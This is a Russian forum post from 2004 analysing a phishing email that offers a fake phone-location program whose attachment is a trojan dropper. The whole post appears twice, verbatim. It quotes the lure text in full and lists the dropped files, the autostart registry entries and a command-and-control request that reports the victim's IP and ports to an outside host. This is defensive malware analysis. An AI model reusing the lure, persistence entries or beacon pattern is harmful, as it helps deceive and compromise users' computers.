Зайцев Олег
29.11.2004, 13:16
Обнаружана рассылка писем с предложением испытать программу для определения координал GSM телефона. Это классика социальной инженерии, поэтому я приведу текст письма целиком:
********************** Начало письма ***********
GSM-Локатор v1.05
П р е д л а г а е м В а ш е м у в н и м а н и ю у н ик а л ь н у ю п р о г р а м м у GSM-Локатор версии 1.05. Данная программа позволяет определить местонахождение мобильного телефона в России и если подключена карта города (города, к которым имеются карты, представлены справа) где находится абонент, то спроецировать местоположение на карту. Если соответствующей карты нет, то отображается город/область местоположения телефона. Точность определения составляет:
для города - 10-20 метров (!)
для пригорода - от 100 до 200 метров, в зависимости от плотности расположения ретрансляторов оператора связи
На данный момент поддерживается определение местоположение сотовых телефонов всех операторов кроме Сонет .
Для телефонов сети МТС и Билайн и их представительств в разных городах никаких ограничений по определению местоположения нет. При роуминге выводится информация о стране.
Для работы этой программы необходимо подключение к интернету. Минимальная конфигурация компьютера: Pentium 133, 16 Mb RAM, Windows 95/98/Me/NT/2000/XP.
Данная программа платная. Одна лицензия стоит 1500 рублей.
Демо версию программы Вы можете скачать здесь , она рассчитана на 24 часа полноценной работы с момента запуска.
Размер дистрибутива 135 Кб, без карт.
По вопросам приобретения звоните +7 (095) 508-11-86
Примечание: разработчик программы снимает с себя ответственность за возможное нарушение закона при использовании данной программы.
********************** Конец письма ***********
К письму приложен файл GSM-Locator v1.05.exe размером 137216 байт. Файл ничем не сжат, написан на Delphi. Касперский опознает его как Trojan-Dropper.Win32.Delf.fr. По экспресс-анализу он и является дроппером, т.к. его задачей является помещение на компьютер нескольких троянов. В результате на компьютере в папке System появляется ряд файлов:
mstasks.exe - 43520 байт, TrojanDropper.Win32.Small.ne*** (в хвосте этого файла есть еще один)
sdchost.exe - 7004 байта, TrojanDownloader.Win32.Small.ub
sdchostc.exe - 12000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab
sdchosts.exe - 17000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab
sorte32.dll - 4000 байт, сжата UPX, TrojanDownloader.Win32.Small.ua
Стоит заметить, что все это "зверье" хранится внутри GSM-Locator v1.05.exe (они приписаны в хвост)
В ключе Run появляется две записи для автозагрузкит троянов:
"mstasks"="C:\\WINDOWS\\SYSTEM\\mstasks.exe"
"Direct settings"="C:\\WINDOWS\\SYSTEM\\sdchost.exe"
проявлением трояна является обмен с сайтом zsewaq3211.infobox.ru вида, который идет с периодически:
GET http://zsewaq3211.infobox.ru/script/command.php?IP=172.20.107.28&Port1=12120&Port2=121
22&ID=002900112004000700470030&L1=-.gif&L2=- HTTP/1.0..User-Agent: \..Host: zsewaq3211.infobox.ru
********************** Начало письма ***********
GSM-Локатор v1.05
П р е д л а г а е м В а ш е м у в н и м а н и ю у н ик а л ь н у ю п р о г р а м м у GSM-Локатор версии 1.05. Данная программа позволяет определить местонахождение мобильного телефона в России и если подключена карта города (города, к которым имеются карты, представлены справа) где находится абонент, то спроецировать местоположение на карту. Если соответствующей карты нет, то отображается город/область местоположения телефона. Точность определения составляет:
для города - 10-20 метров (!)
для пригорода - от 100 до 200 метров, в зависимости от плотности расположения ретрансляторов оператора связи
На данный момент поддерживается определение местоположение сотовых телефонов всех операторов кроме Сонет .
Для телефонов сети МТС и Билайн и их представительств в разных городах никаких ограничений по определению местоположения нет. При роуминге выводится информация о стране.
Для работы этой программы необходимо подключение к интернету. Минимальная конфигурация компьютера: Pentium 133, 16 Mb RAM, Windows 95/98/Me/NT/2000/XP.
Данная программа платная. Одна лицензия стоит 1500 рублей.
Демо версию программы Вы можете скачать здесь , она рассчитана на 24 часа полноценной работы с момента запуска.
Размер дистрибутива 135 Кб, без карт.
По вопросам приобретения звоните +7 (095) 508-11-86
Примечание: разработчик программы снимает с себя ответственность за возможное нарушение закона при использовании данной программы.
********************** Конец письма ***********
К письму приложен файл GSM-Locator v1.05.exe размером 137216 байт. Файл ничем не сжат, написан на Delphi. Касперский опознает его как Trojan-Dropper.Win32.Delf.fr. По экспресс-анализу он и является дроппером, т.к. его задачей является помещение на компьютер нескольких троянов. В результате на компьютере в папке System появляется ряд файлов:
mstasks.exe - 43520 байт, TrojanDropper.Win32.Small.ne*** (в хвосте этого файла есть еще один)
sdchost.exe - 7004 байта, TrojanDownloader.Win32.Small.ub
sdchostc.exe - 12000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab
sdchosts.exe - 17000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab
sorte32.dll - 4000 байт, сжата UPX, TrojanDownloader.Win32.Small.ua
Стоит заметить, что все это "зверье" хранится внутри GSM-Locator v1.05.exe (они приписаны в хвост)
В ключе Run появляется две записи для автозагрузкит троянов:
"mstasks"="C:\\WINDOWS\\SYSTEM\\mstasks.exe"
"Direct settings"="C:\\WINDOWS\\SYSTEM\\sdchost.exe"
проявлением трояна является обмен с сайтом zsewaq3211.infobox.ru вида, который идет с периодически:
GET http://zsewaq3211.infobox.ru/script/command.php?IP=172.20.107.28&Port1=12120&Port2=121
22&ID=002900112004000700470030&L1=-.gif&L2=- HTTP/1.0..User-Agent: \..Host: zsewaq3211.infobox.ru